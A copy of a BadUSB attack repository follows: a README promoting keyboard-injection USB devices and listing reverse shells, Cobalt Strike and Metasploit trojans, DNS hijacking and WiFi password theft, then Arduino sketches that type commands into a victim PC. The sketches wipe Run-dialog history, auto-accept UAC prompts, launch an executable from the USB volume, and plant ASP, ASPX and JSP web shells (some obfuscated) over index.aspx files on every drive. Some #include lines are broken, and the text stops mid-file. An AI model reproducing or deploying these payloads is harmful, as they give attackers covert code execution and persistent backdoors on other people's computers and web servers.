你可以在微信、QQ群、Gitee、Gihub上留言,团队看到后会尽快回复。 ![常见问题和错误](https://upload-images.jianshu.io/upload_images/11477676-0c90a8004d5e5420.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### 扩展
实现特定功能
其他实现BadUSB功能的板子(需要另安驱动,不是特别推荐)
![扩展](https://upload-images.jianshu.io/upload_images/11477676-bba7de72abd2072d.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### 更新
###### 2021.02.06更新代码,部分是从其他爱好者哪里搜寻的开源代码,部分是与MSF联动的方法流程以及我认为比较好用的Arduino Leonardo基础按键代码
###### 2021.02.14更新代码,从其他优秀项目中获得启发,加入了CobaltStrike联动的木马、DNS劫持代码、linux和osx内置反向shell、WIFI连接木马、WIFI密码获取、网站一句话入侵代码、psl全屏hacked画面、运行U盘内的程序_扩大入侵范围以及实现很多实用功能的代码,情人节快乐!
![更新](https://upload-images.jianshu.io/upload_images/11477676-a54932b08d3ef2da.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### 项目链接
代码已上传至GitHub及Gitee,**跪求star**,其他项目也挺好玩的, **继续跪求Star**。
**GitHub:** https://github.com/wangwei39120157028/BadUSB
**Gitee:** https://gitee.com/wwy2018/BadUSB
================================================ FILE: README.md ================================================ # BadUSB ![](https://img.shields.io/badge/BadUSB-fsociety-red)
This project does not exploit a flaw in the USB protocol itself; it abuses the host's unconditional trust in whatever device class a USB peripheral declares. By changing the internal firmware of a USB device, it enumerates as an external keyboard/mouse as soon as it is plugged in and types carefully prepared commands into the target host.
![68747470733a2f2f696d616765732e67697465652e636f6d2f75706c6f6164732f696d616765732f323032312f303230322f3231333933325f36653462313436665f323332333636362e6a706567](https://user-images.githubusercontent.com/39434325/112772972-75a8e900-9066-11eb-9948-895916bf18ef.jpg)
#### QQ:775942445
#### WeChat:wwy18795980897
### Introduction
Like most people, I first came across BadUSB in the TV series Mr. Robot, where it is one of fsociety's favourite tools. Whether it is fetching a trojan from a server to take control of a victim's host, or Darlene scattering a pile of USB sticks across a parking lot as bait, BadUSB is one of the show's most important physical weapons.
![黑客军团](https://upload-images.jianshu.io/upload_images/11477676-71045c807dac0df6.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### Advantage
Years ago the usual USB attack was the old autorun.inf USB worm, but that file is now trivially caught by antivirus. BadUSB works differently: instead of relying on anything stored on the drive, the device's firmware is modified so that, once plugged into an ordinary USB port, it enumerates as an external keyboard/mouse and types pre-built commands into the host. Because the code lives in the firmware rather than on the flash storage, formatting the drive does not remove it. The original text claims this raises no suspicion from antivirus or firewalls; that is overstated. The injected commands still run as ordinary host processes (cmd.exe, PowerShell, outbound connections), so PowerShell script-block logging and AMSI, EDR rules that flag a newly enumerated HID device typing at inhuman speed, USB device allow-listing, and egress filtering all give defenders a chance to catch it.
![Leonardo_Arduino](https://upload-images.jianshu.io/upload_images/11477676-4347a3e41663dde6.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
My favourite board is the Arduino Leonardo: Windows, Linux, macOS and other operating systems all ship a driver for its USB HID interface out of the box, so nothing has to be downloaded. Programming the board is also very simple—most sketches just emulate keyboard and mouse key presses—so it is easy to get started.
BadUSB is also a good example of social engineering. It plays on people's curiosity. It's estimated that more than 90% of people will want to see what's inside a USB they pick up on the side of the road.

![BadUSB钓鱼](https://upload-images.jianshu.io/upload_images/11477676-3d1f812778254931.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### Tutorial
[Video address](https://www.yuque.com/u12074055/cpuceb/qicml3)
Video: Introduction to the BadUSB compiler
Video: BadUSB driver installation and code writing
Video: BadUSB basic operation
[For detailed steps, please go to the brief book](https://www.jianshu.com/p/2b2b1dab85fe)
![操作步骤](https://upload-images.jianshu.io/upload_images/11477676-390539861bec703c.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### Directory
BadUSB │ LICENSE │ README.en.md │ README.md │ ├─AddUser_StartService │ AddUser_Enable3389(tools).ino │ AddUser_EnableFTP(tools).ino │ ├─BlueScreen │ BlueScreen1(DOS).ino │ BlueScreen2(DOS).ino │ BlueScreen3(DOS).ino │ BlueScreen_xp_win7(DOS).ino │ DelayedBlueScreen (DOS).ino │ RegistryWriteBlueScreen (DOS).ino │ RegistryWriteBlueScreenGeneralUse (DOS).ino │ ├─CobaltStrike_Trojanlinkage │ │ Bitsadmin_TrojanExecution (LinkageWithCS).ino │ │ Pl_TrojanExecution (LinkageWithCS).ino │ │ PSL_TrojanExecution (LinkageWithCS).ino │ │ PY_TrojanExecution (LinkageWithCS).ino │ │ Regsvr32_TrojanExecution (LinkageWithCS).ino │ │ │ ├─CobaltStrike_Payload │ │ payload.bin │ │ payload.c │ │ payload.cs │ │ payload.java │ │ payload.pl │ │ payload.ps1 │ │ payload.py │ │ payload.rb │ │ payload.sct │ │ payload.txt │ │ payload.vba │ │ │ └─CounterStrikeTrojanTutorial │ CounterStrike.jpg │ CounterStrikeTutorial.png │ ├─CodePrincipleInterpretation │ ArduinoKeyCodeBase.ino │ InstructionsOn_setup_loop_Methods.txt │ MSF_TrojanMakingTutorial.txt │ ├─DNSHijack │ DOS_CommandSetMultipleDNS(DNSHijack).ino │ PSL_CommandSetMultipleDNS(DNSHijack).ino │ ├─Linux_Built-inReverseShell │ LinuxReverseShell (CodeExecution).ino │ LinuxReverseShell(BashShell).ino │ LinuxReverseShell(PerlShell).ino │ ├─MSF_Trojanlinkage │ shell.apk │ shell.asp │ shell.aspx │ shell.elf │ shell.exe │ shell.jar │ shell.jsp │ shell.macho │ shell.php │ shell.pl │ shell.psl │ shell.py │ shell.sh │ shell.war │ Shell_TrojanGenerationConfiguration.txt │ ├─OSX_Built-inReverseShell │ OSX_SystemReverseConnection (dns_shell).ino │ OSX_SystemReverseConnection (perl_shell).ino │ OSX_SystemReverseConnection (ruby_shell).ino │ ├─PSL_FullScreen-HACKED │ ├─FullScreenHackedv0 │ │ │ get.ps1 │ │ │ │ │ └─FullScreenHackedv │ │ FullScreenHackedv.ino │ │ │ ├─FullScreenHackedv2 │ │ FullScreenHackedv2.ino │ │ wall.ps1 │ │ │ └─FullScreenHackedv3 │ │ get.ps1 │ │ │ └─FullScreenHackedv3 │ FullScreenHackedv3.ino │ ├─RunProgramOn_UDrive_ExpandScopeOfIntrusion │ 
├─UdiskRun │ │ UdiskRun.ino │ │ │ ├─UdiskRunv2 │ │ UdiskRunv2.ino │ │ │ └─UdiskRunv3 │ UdiskRunv3.ino │ ├─Site_AWord_IntrusionCode │ AspSentenceTrojanWrite(webServerVersion).ino │ AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino │ AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino │ AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino │ AspxSentenceTrojanWrite(webServerVersion).ino │ JspSentenceTrojanWritten (JSP_websiteServerUse).ino │ JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino │ PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino │ PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino │ PHP_TrojanWrite(usedByPHP_websiteServer).ino │ ├─SpecificFunctionCode │ AddUserCode(Tools).ino │ Alt-f4_Loop.ino │ ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino │ EnablePSL_RemoteConnection(Tools).ino │ ForcedDeletionOf360Processes(Tools).ino │ ForceShutDownCommand(Tool).ino │ Hide_CMD_Window(Display).ino │ MouseKeepsMoving(Tools).ino │ OpenPort445.ino │ OpenSpecified_webPage.ino │ ShiftBackdoor.ino │ SimplyChangeAllUsersPasswords(TrickItem).ino │ SimplyShutDownMachine(TrickItem).ino │ TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino │ ├─TrojanDownloader │ ├─CERTUTIL_DownLoader │ │ CERTUTIL_DownLoader_MSF.ino │ │ │ ├─FTP_DownLoader │ │ FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino │ │ │ ├─JAVA_DownLoader │ │ JavaTrojanWrite(TargetEnvironmentRunJava).ino │ │ server.java │ │ │ ├─PSL_DownLoader │ │ Downloa_PSL_Trojan-Execute_aSecondTime.ino │ │ LinkServer_MSF_PSL_Download.ino │ │ LinkServer_PSL_Download.ino │ │ PSL_DownLoader0.ino │ │ PSL_DownLoader1.ino │ │ PSL_DownLoader2.ino │ │ PSL_DownLoader3.ino │ │ PSL_DownLoader4.ino │ │ PSL_Downloader_Win&Linux_General.ino │ │ PSL_Writes_Bounces.ino │ │ │ └─PY_DownLoader │ PyShellServer.py │ Py_TrojanWrite(TargetEnvironmentRunPython).ino │ ├─Ubuntu_InformationGathering │ BasicTerminalCommandsForUbuntu(Display).ino │ 
UbuntuInformationCollectionTXT_File(Information).ino │ ├─WiFi_ConnectionTrojan │ ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino │ └─WiFi_PasswordAcquisition WiFiPasswordCapture(tool).ino WiFiPasswordExport(tool).ino ### Demo
[Video address](https://www.yuque.com/u12074055/gzgwfh/dg804t)
Video: [Hardware Hacker] Control the upload through WiFi to execute, run, write HID scripts for BADUSB as well as a small extra 1
Video: [Hardware Hacker] Control the upload via WiFi to execute, run, and write HID scripts for BADUSB as well as a small extra 2
Video: [BADUSB Demo] U Drive Attack: Ignore any kill soft, hack your computer in 3 seconds!
Video: [BADUSB Demo] Invading Square Large Screen, with Tutorial 1
Video: [BADUSB Demo] Invading Square Large Screen, with Tutorial 2
Video: [BADUSB demo] BADUSB implementation record keyboard
Video: [BADUSB demo] Change the password of the account used + close the system process + blue screen test
![演示](https://upload-images.jianshu.io/upload_images/11477676-31390e8446540ca3.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### Advanced
[Video address](https://www.yuque.com/u12074055/cpuceb/dm1veu)
Video: Badusb&MSF linkage
Video: Start BadUSB with Nethunter
![进阶](https://upload-images.jianshu.io/upload_images/11477676-cc6c47da713ac2e2.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### Frequently asked questions and errors
[Video address](https://www.yuque.com/u12074055/cpuceb/uofha2)
Video: BadUSB code writes exception handling
![常见问题和错误](https://upload-images.jianshu.io/upload_images/11477676-0c90a8004d5e5420.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### extension
[Video address](https://www.yuque.com/u12074055/cpuceb/hs3n7p)
Video: [Hardware Hacker] Nine dollars to make a BadUSB
Video: [Hardware Hacker] can directly replace Big Yellow Duck and Wifiducky's new BadUSB
Video: BadUSB Tutorial Digispark + Chinese BadUSB
![扩展](https://upload-images.jianshu.io/upload_images/11477676-bba7de72abd2072d.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### Update
###### 2021.02.06 code update: part of it is open-source code collected from other enthusiasts, part is the workflow for linking with MSF plus the basic Arduino Leonardo key-press code that I find most useful
###### 2021.02.14 code update, inspired by other good projects: added CobaltStrike-linked trojans, DNS-hijacking code, Linux and OSX built-in reverse shells, a WiFi-connection trojan, WiFi password extraction, web-shell ("one-sentence trojan") writers, the PSL full-screen "HACKED" screen, running programs from the U-disk to widen the intrusion, and a lot of practical utility code. Happy Valentine's Day!
![更新](https://upload-images.jianshu.io/upload_images/11477676-a54932b08d3ef2da.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### Link
The code has been uploaded to GitHub and Gitee — **please star it**; the other projects are fun too, **stars welcome there as well**.
**GitHub:** https://github.com/wangwei39120157028/BadUSB
**Gitee:** https://gitee.com/wwy2018/BadUSB
================================================ FILE: RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRun/UdiskRun.ino ================================================
/* Runs an executable carried on a companion USB volume. Via Win+R the sketch types a cmd session
   that finds the drive letter of the volume labelled LEMONC (wmic volume ... | find), copies
   <drive>\x.exe to %TMP% and runs it; it then repeats the same steps from a UAC-elevated cmd
   (Start-Process -Verb RunAs, Alt+Y to accept the consent prompt). Every cmd is started with
   `reg delete ...\Explorer\RunMRU /f`, which wipes the Run-dialog history (anti-forensics).
   Artifacts to look for: %TMP%\x.exe and an emptied RunMRU key. */
void setup() { // initialisation
  Keyboard.begin(); // start keyboard emulation
  delay(5000); // wait for the host to enumerate the device
  Keyboard.press(KEY_LEFT_GUI); // Win key
  delay(500);
  Keyboard.press('r'); // r key -> Run dialog
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500);
  Keyboard.println("cmd /k reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");
  delay(500);
  // first token of the matching `wmic volume` line is the drive letter of the LEMONC volume
  Keyboard.println("for /f %a in (\'wmic volume get driveletter^,label ^| Find \"LEMONC\"\') do (set ab=%a)");
  delay(100);
  Keyboard.println("copy /y %ab%\\x.exe %tmp%&%tmp%\\x.exe&exit");
  delay(1000);
  Keyboard.press(KEY_LEFT_GUI); // Win key
  delay(500);
  Keyboard.press('r'); // r key
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  // NOTE(review): there is no space before `-verb`, so PowerShell may not bind it as the -Verb
  // parameter; the v2/v3 sketches write `-VERB RUNAS` as separate tokens — confirm on a test box.
  Keyboard.println("powershell -c start-process -Filepath cmd \' /k reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f\'-verb runas");
  delay(3000);
  Keyboard.press(KEY_LEFT_ALT); // Alt+Y — intended to press "Yes" on the UAC prompt
  Keyboard.print('y');
  Keyboard.release(KEY_LEFT_ALT);
  delay(1000);
  Keyboard.println("for /f %a in (\'wmic volume get driveletter^,label ^| Find \"LEMONC\"\') do (set ab=%a)");
  delay(500);
  Keyboard.println("copy /y %ab%\\x.exe %tmp%&%tmp%\\x.exe&exit");
  Keyboard.end(); // stop keyboard emulation
}
void loop() // loop
{ }
================================================ FILE: RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv2/UdiskRunv2.ino ================================================
/* Same idea, elevated only. Text is typed in inverted case with Caps Lock toggled on (the
   Site_AWord_IntrusionCode sketches give the Chinese-IME reason), the UAC prompt is hammered with
   100 Alt+Y presses, and X.EXE is run straight from the LEMONC volume without copying it. */
void setup() { // initialisation
  Keyboard.begin(); // start keyboard emulation
  delay(5000); // delay
  Keyboard.press(KEY_LEFT_GUI); // Win key
  delay(500);
  Keyboard.press('r'); // r key
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.println("CMD /K REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F");
  delay(500);
  Keyboard.println("POWERSHELL -C START-PROCESS -fILEPATH CMD -VERB RUNAS&TASKKILL /F /IM CMD.EXE");
  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);
  for(int i=0;i<100;i++){ // 100 x Alt+Y, 10 ms apart, to catch the UAC prompt whenever it appears
    delay(10);
    Keyboard.print('y');
  }
  Keyboard.release(KEY_LEFT_ALT);
  delay(1000);
  Keyboard.println("FOR /F %A IN (\'WMIC VOLUME GET DRIVELETTER^,LABEL ^| fIND \"lemonc\"\') DO (SET AB=%A)");
  delay(300);
  Keyboard.println("%AB%\\X.EXE&&TASKKILL /F /IM CMD.EXE");
  Keyboard.press(KEY_CAPS_LOCK); // restore Caps Lock
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end(); // stop keyboard emulation
}
void loop() // loop
{ }
================================================ FILE: RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv3/UdiskRunv3.ino ================================================
/* v2 collapsed into one Run-dialog line (cmd /c ... & powershell Start-Process cmd -Verb RunAs),
   with a single Alt+Y for the UAC prompt. Typed in inverted case under Caps Lock. */
void setup() { // initialisation
  Keyboard.begin(); // start keyboard emulation
  delay(5000); // delay
  Keyboard.press(KEY_LEFT_GUI); // Win key
  delay(500);
  Keyboard.press('r'); // r key
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.println("CMD /c REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&POWERSHELL -C START-PROCESS -fILEPATH CMD -VERB RUNAS");
  delay(1500);
  Keyboard.press(KEY_LEFT_ALT); // Alt+Y — intended to press "Yes" on the UAC prompt
  Keyboard.print('y');
  Keyboard.release(KEY_LEFT_ALT);
  delay(1000);
  Keyboard.println();
  delay(300);
  Keyboard.println("FOR /F %A IN (\'WMIC VOLUME GET DRIVELETTER^,LABEL ^| fIND \"lemonc\"\') DO (SET AB=%A)"); // "lemonc" (the volume label) can be replaced
  delay(300);
  Keyboard.println("%AB%\\X.EXE&&TASKKILL /F /IM CMD.EXE");
  Keyboard.press(KEY_CAPS_LOCK); // restore Caps Lock
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end(); // stop keyboard emulation
}
void loop() // loop
{ }
================================================ FILE: Site_AWord_IntrusionCode/AspSentenceTrojanWrite(webServerVersion).ino ================================================
// NOTE(review): the header name after #include is missing — most likely stripped as an HTML tag
// when the repository was exported. As written this line does not compile.
#include
void setup() { // initialisation
  Keyboard.begin(); // start keyboard emulation
  delay(5000); // delay
  // Toggle Caps Lock first: the original author notes that without this, typing goes wrong on most
  // machines where a Chinese IME is active.
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK); // release Caps Lock
  delay(200);
  Keyboard.press(KEY_LEFT_GUI); // Win key
  delay(200);
  Keyboard.press('r'); // r key
  delay(200);
Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println('echo ^<%eval request("wwy")%^> >> hacked.asp'); //向hacked.asp写内容,密码wwy delay(200); Keyboard.println("echo @echo off >> hacked.bat"); delay(200); Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx delay(200); Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat"); delay(200); Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if exist %%a:\ ( >> hacked.bat"); delay(200); Keyboard.println("echo pushd %%a:\ >> hacked.bat"); delay(200); Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat"); delay(200); Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo popd >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接 delay(9000); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println("echo ^<% >> hacked.asp"); //向hacked.asp写内容,密码z delay(200); Keyboard.println("echo Function 
MorfiCoder(Code) >> hacked.asp"); delay(200); Keyboard.println("echo MorfiCoder=Replace(Replace(StrReverse(Code),'/*/',''''),'\*\',vbCrlf) >> hacked.asp"); delay(200); Keyboard.println("echo End Function >> hacked.asp"); delay(200); Keyboard.println('echo Execute MorfiCoder(")/*/z/*/(tseuqer lave") >> hacked.asp'); delay(200); Keyboard.println("echo %^> >> hacked.asp"); delay(200); Keyboard.println("echo @echo off >> hacked.bat"); delay(200); Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx delay(200); Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat"); delay(200); Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if exist %%a:\ ( >> hacked.bat"); delay(200); Keyboard.println("echo pushd %%a:\ >> hacked.bat"); delay(200); Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat"); delay(200); Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo popd >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接 delay(9000); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); 
Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println("echo ^<%@ LANGUAGE = VBScript.Encode %^> >> hacked.asp"); //向hacked.asp写内容,密码wwy delay(200); Keyboard.println('echo ^<%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%^> >> hacked.asp'); //向hacked.asp写内容,密码c delay(200); Keyboard.println("echo @echo off >> hacked.bat"); delay(200); Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx delay(200); Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat"); delay(200); Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if exist %%a:\ ( >> hacked.bat"); delay(200); Keyboard.println("echo pushd %%a:\ >> hacked.bat"); delay(200); Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat"); delay(200); Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo popd >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接 delay(9000); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); 
Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println("echo ^<%@ Page Language = Jscript %^> >> hacked.aspx"); //向hacked.aspx写内容,密码-7 delay(200); Keyboard.println("echo ^<%var/*-/*-*/P/*-/*-*/=/*-/*-*/'e'+'v'+/*-/*-*/ >> hacked.aspx"); delay(200); Keyboard.println("echo 'a'+'l'+'('+'R'+'e'+/*-/*-*/'q'+'u'+'e'/*-/*-*/+'s'+'t'+ >> hacked.aspx"); delay(200); Keyboard.println("echo '[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]'+ >> hacked.aspx"); delay(200); Keyboard.println("echo ','+'\''+'u'+'n'+'s'/*-/*-*/+'a'+'f'+'e'+'\''+')';eval >> hacked.aspx"); delay(200); Keyboard.println("echo (/*-/*-*/P/*-/*-*/,/*-/*-*/'u'+'n'+'s'/*-/*-*/+'a'+'f'+'e'/*-/*-*/);%^> >> hacked.aspx"); delay(200); Keyboard.println("echo @echo off >> hacked.bat"); delay(200); Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx delay(200); Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat"); delay(200); Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if exist %%a:\ ( >> hacked.bat"); delay(200); Keyboard.println("echo pushd %%a:\ >> hacked.bat"); delay(200); Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat"); delay(200); Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo popd >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接 delay(9000); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion).ino 
================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println('echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["wwy"],"unsafe");%^> >> hacked.asp'); //向hacked.asp写内容,密码wwy delay(200); Keyboard.println("echo @echo off >> hacked.bat"); delay(200); Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx delay(200); Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat"); delay(200); Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if exist %%a:\ ( >> hacked.bat"); delay(200); Keyboard.println("echo pushd %%a:\ >> hacked.bat"); delay(200); Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat"); delay(200); Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo popd >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接 delay(9000); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: Site_AWord_IntrusionCode/JspSentenceTrojanWritten (JSP_websiteServerUse).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 
不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println('echo ^<%@page import="java.lang.*"%^> >> hacked.jsp'); //向hacked.jsp写内容,这是一种jsp常见的一句话跳板木马,http://localhost/1.jsp?f=1.txt&t=hacker ,然后:http://localhost/1.txt 就出来了 内容为hacker,便于挂jsp大马 delay(200); Keyboard.println("echo ^<% >> hacked.jsp"); Keyboard.println('echo if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); >> hacked.jsp'); Keyboard.println("echo %^> >> hacked.jsp"); Keyboard.println("echo @echo off >> hacked.bat"); delay(200); Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); 